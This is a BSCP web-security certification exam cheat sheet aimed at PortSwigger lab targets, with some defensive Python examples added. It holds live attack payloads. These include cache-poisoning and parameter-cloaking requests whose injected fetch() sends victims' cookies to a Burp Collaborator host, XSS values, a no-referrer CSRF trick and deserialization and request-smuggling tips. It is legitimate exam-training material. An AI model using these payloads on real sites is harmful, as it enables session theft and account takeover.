BSCP Methodology
Exam Info
BSCP Cheat sheet (needs translation). There is always an administrator account with the username "administrator", plus a lower-privileged account usually called "carlos". If you find a username enumeration vulnerability, you may be able to break into the low-privileged account using the following username list and password list.
Each application has up to one active user, who will be logged in either as a user or as an administrator. You can assume that they will visit the homepage of the site every 15 seconds and click any links in any emails they receive from the application. You can use the exploit server's "send to victim" functionality to target them with reflected vulnerabilities.
If you find an SSRF vulnerability, you can use it to read files by accessing an internal-only service, running on localhost on port 6566.
Each stage can be cross-referenced with the types of vulnerabilities you can expect to observe.
Objective for Stage 1: Get any user access
SQL Injection
Cross-Site Scripting
Authentication / Credentials Brute force
Request Smuggling
Web Cache Poisoning
Objective for Stage 2: Get Admin access
SQL Injection
Cross-Site Scripting
Cross Site Request Forgery
HTTP host header attacks
Server-Side Request Forgery
Access Control vulnerabilities
Authentication / Credentials Brute force
Objective for Stage 3: Read Contents of ‘/home/carlos/secret’
XML External Entities
SQL Injection
Command Injection
Server-Side Template Injection
Path Traversal
File Upload attacks
Insecure Deserialization
Useful Burp extensions (some of them require Burp Suite Pro) and tips
Hackvertor
Copy As Python-Requests
Java Deserialization Scanner | ysoserial.jar for manual exploitation (preferred, because sometimes this extension doesn't work as it should)
HTTP Request Smuggler
Param Miner
Cross-Site Scripting Section
When the exam involves XSS for the user stage, start by searching for JavaScript files in the source code or use DOM Invader on search forms. You can find an injection point with some payloads from this repository: PayloadsAllTheThings XSS Injection. Also here: XSS Payloads
Bypass restrictions method 1
Sometimes we find an XSS injection point that has keyword restrictions, so we have to bypass those restrictions with techniques like the ones below.
Generate the base64 payload
Insert the base64 payload into atob function
Capture credentials from auto-filled forms
Sometimes users rely on password managers that fill in forms automatically; with this technique we can grab those credentials just by making a small HTML form.
DOM XSS
An awesome Google Chrome extension (from Burp Suite) is DOM Invader, which you can use for DOM XSS testing.
Exploit Server Section
Send exploit to victim (Reflected XSS in search bar)
With a <meta> HTML tag we can redirect the "victim" to our JavaScript-injected search query.
Useful source from PortSwigger during the exam: Cross-Site Scripting Cheat Sheet
Different XSS Payloads
SQL Injection Section
SQL Injection cheat sheet PortSwigger
Useful solved labs:
Useful scripts for blind sql injection exfil
PostgreSQL
Time Based
Identify time based
Database Dump Time Based
Table Dump Time Based
Columns Dump Time Based
Exfiltrate data with SQLMap
Command Injection Section
Directory Traversal Section
CSRF Section
Referer validation depends on header being present
<meta name="referrer" content="no-referrer">
CSRF with broken Referer validation
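The two Referer weaknesses above, side by side with the check a defender wants, as an added example (not code from the labs or from PortSwigger). `APP_HOST` is a placeholder for the application's own host.

```python
from urllib.parse import urlparse

APP_HOST = "vulnerable-website.com"  # placeholder for the application's host


def referer_check_lenient(referer):
    """Vulnerable pattern 1: accept the request when the Referer is absent.
    A page served with <meta name="referrer" content="no-referrer"> makes the
    browser omit the header, so this check is skipped entirely."""
    if referer is None:
        return True
    return urlparse(referer).hostname == APP_HOST


def referer_check_substring(referer):
    """Vulnerable pattern 2: substring match. Any Referer that merely contains
    the application's host somewhere in its path or query is accepted."""
    return referer is not None and APP_HOST in referer


def referer_check_strict(referer):
    """Hardened: the header must be present and the parsed host must match the
    application exactly (no substring or suffix matching)."""
    if not referer:
        return False
    parsed = urlparse(referer)
    return parsed.scheme == "https" and parsed.hostname == APP_HOST
```

A Referer check alone is still a weak defence; in production it belongs next to an Origin check, SameSite cookies and per-session CSRF tokens.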
Insecure Deserialization Section
Java
If you have the Java Deserialization Scanner Burp extension you can do an active scan (Pro version only) and maybe you will find something ;) at the very least, exploit it manually with the tool below.
ysoserial.jar
Payloads for ysoserial
Don't forget that the payloads below require URL encoding after they are generated.
More information about the payloads and related material can be found in the ysoserial official repository.
PHP
Simple modification of a PHP serialized object
As we can see there is a field called admin with a boolean value of 0 -> false. By changing the boolean value to 1 we automatically become an administrator.
Modifying PHP serialized data types
As we can see the serialized cookie is validated with the access_token field. We can imagine the back-end access_token validation, so we can perform the attack by changing the access_token from string type to boolean (1) -> true. See below:
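Both PHP tricks above (flipping admin, and turning access_token into b:1 so a loose comparison matches any token) come down to the server trusting client-supplied types and values. The following added example (my own code, not the lab's or PHP's) parses the serialized cookie format and shows the check a back end should perform instead; the cookie strings are constructed samples.

```python
import hmac
import re


def php_unserialize(data):
    """Minimal parser for PHP serialize() output (s, i, b, a, O only).
    Returns (value, remaining_text); objects become (class_name, fields).
    Lengths are treated as characters, so ASCII-only input is assumed."""
    tag = data[0]
    if tag == "s":
        m = re.match(r's:(\d+):"', data)
        n, start = int(m.group(1)), m.end()
        return data[start:start + n], data[start + n + 2:]  # skip closing '";'
    if tag == "i":
        m = re.match(r"i:(-?\d+);", data)
        return int(m.group(1)), data[m.end():]
    if tag == "b":
        m = re.match(r"b:([01]);", data)
        return m.group(1) == "1", data[m.end():]
    if tag in "aO":
        m = re.match(r'(?:a|O:\d+:"([^"]*)"):(\d+):\{', data)
        cls, rest, fields = m.group(1), data[m.end():], {}
        for _ in range(int(m.group(2))):
            key, rest = php_unserialize(rest)
            fields[key], rest = php_unserialize(rest)
        return (cls, fields) if tag == "O" else fields, rest[1:]  # drop '}'
    raise ValueError(f"unsupported type tag {tag!r}")


def validate_session_cookie(serialized, server_side_token):
    """Defensive check: the client may only prove identity with a *string*
    token compared in constant time. The admin flag in the cookie is ignored;
    roles must be looked up server-side, never read from client data."""
    try:
        (cls, fields), rest = php_unserialize(serialized)
    except (AttributeError, ValueError, IndexError):
        return "reject: malformed"
    if cls != "User" or rest:
        return "reject: unexpected structure"
    token = fields.get("access_token")
    if not isinstance(token, str):  # b:1 in place of s:32:"..." ends here
        return "reject: access_token is not a string"
    if not hmac.compare_digest(token, server_side_token):
        return "reject: bad token"
    return "ok"


TOKEN = "a" * 32  # constructed server-side token
LEGIT = ('O:4:"User":3:{s:8:"username";s:6:"carlos";s:12:"access_token";'
         's:32:"' + TOKEN + '";s:5:"admin";b:0;}')   # constructed cookie
ADMIN_FLIPPED = LEGIT.replace("b:0;", "b:1;")
TOKEN_TO_BOOL = LEGIT.replace('s:32:"' + TOKEN + '"', "b:1")
```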
Ruby
You can run the above script here: https://www.onlinegdb.com/online_ruby_compiler
HTTP request smuggling Section
Useful solved labs:
For manual exploitation of CL.TE and TE.CL we can use the Simple HTTP Smuggler Generator CL.TE TE.CL
Response queue poisoning via H2.TE request smuggling
"Most of the time, you will receive your own 404 response. Any other response code indicates that you have successfully captured a response intended for the admin user. Repeat this process until you capture a 302 response containing the admin's new post-login session cookie."
Request smuggling via CRLF injection
Add a foo header and, from the Inspector, change the value of the foo header like below.
Request splitting via CRLF injection
Add a foo header and, from the Inspector, change the value of the foo header like below.
Send requests repeatedly until you get a 302 redirect to /my-account with the session cookie of the administrator.
XML external entity (XXE) injection Section
XInclude attack (XXE)
Information disclosure Section
Always go for directory brute force and for dot files (hidden files), e.g. .git
Web Cache Poisoning Section
A useful tip for web cache poisoning is to use the Param Miner Burp extension.
Web cache poisoning with an unkeyed cookie:
fehost="-alert(document.cookie)-"
Basic web cache poisoning
The X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag.
Targeted web cache poisoning using an unknown header
Vary: User-Agent
-> "For example, if the attacker knows that the User-Agent header is part of the cache key, by first identifying the user agent of the intended victims, they could tailor the attack so that only users with that user agent are affected."
X-Host: exploitserver.net/resources/js/tracking.js
Steal other users' User-Agents: if you have post functionality you can use this payload:
The final step is to poison the victims' User-Agents that were stolen through the img tag.
Parameter cloaking
GET /js/geolocate.js?callback=setCountryCookie&utm_content=foo;callback=alert(1)
Parameter cloaking steal cookies:
GET /js/geolocate.js?callback=setCountryCookie&utm_content=aaa;callback=fetch("https://xxxx.burpcollaborator.net/c="%2bdocument.cookie); HTTP/2
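Parameter cloaking works because the cache and the back end parse the same query string differently. The added example below (my own code, not the lab's or any cache product's) models the two parsers for the geolocate.js request above and shows a cache key routine that refuses to store a response when they disagree. The set of unkeyed parameters is an assumption.

```python
import re
from urllib.parse import urlsplit

UNKEYED = {"utm_content"}  # parameters the cache leaves out of its key (assumed)


def cache_view(query):
    """How the cache parses the query: split on '&' only, then drop the
    unkeyed parameters. 'foo;callback=alert(1)' stays one utm_content value."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name not in UNKEYED:
            params[name] = value
    return params


def backend_view(query):
    """How a back end that also accepts ';' as a separator parses the same
    query: the smuggled 'callback' becomes a second occurrence and wins."""
    params = {}
    for pair in re.split(r"[&;]", query):
        name, _, value = pair.partition("=")
        params[name] = value
    return params


def cloaked_params(url):
    """Keyed parameters whose value the cache believes differs from the value
    the back end will actually use. Non-empty means the response stored under
    this key was generated from a value hidden inside an unkeyed parameter."""
    query = urlsplit(url).query
    cache, backend = cache_view(query), backend_view(query)
    return sorted(name for name in cache if backend.get(name) != cache[name])


def cache_key(url):
    """Defensive cache key: return None (do not cache) when the two parsers
    disagree, instead of storing a poisoned response under a clean key."""
    if cloaked_params(url):
        return None
    parts = urlsplit(url)
    keyed = "&".join(f"{k}={v}" for k, v in sorted(cache_view(parts.query).items()))
    return f"{parts.path}?{keyed}"
```

The real fix is to make the cache parse parameters exactly as the back end does (or to key on the raw query string); the bypass here is only a safe fallback.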
Steal cookies through cache poisoning via an unkeyed query parameter
GET /?utm_content='/><script><@burp_urlencode>fetch("https://m0nckht7kyvq0d3n793ad2ey2p8fw4.burpcollaborator.net/?c="+document.cookie)<@/burp_urlencode></script> HTTP/2
P.S. Don't forget the required Burp extension called Hackvertor in order to URL-encode the JavaScript payload.
X-Forwarded-Scheme web cache poisoning method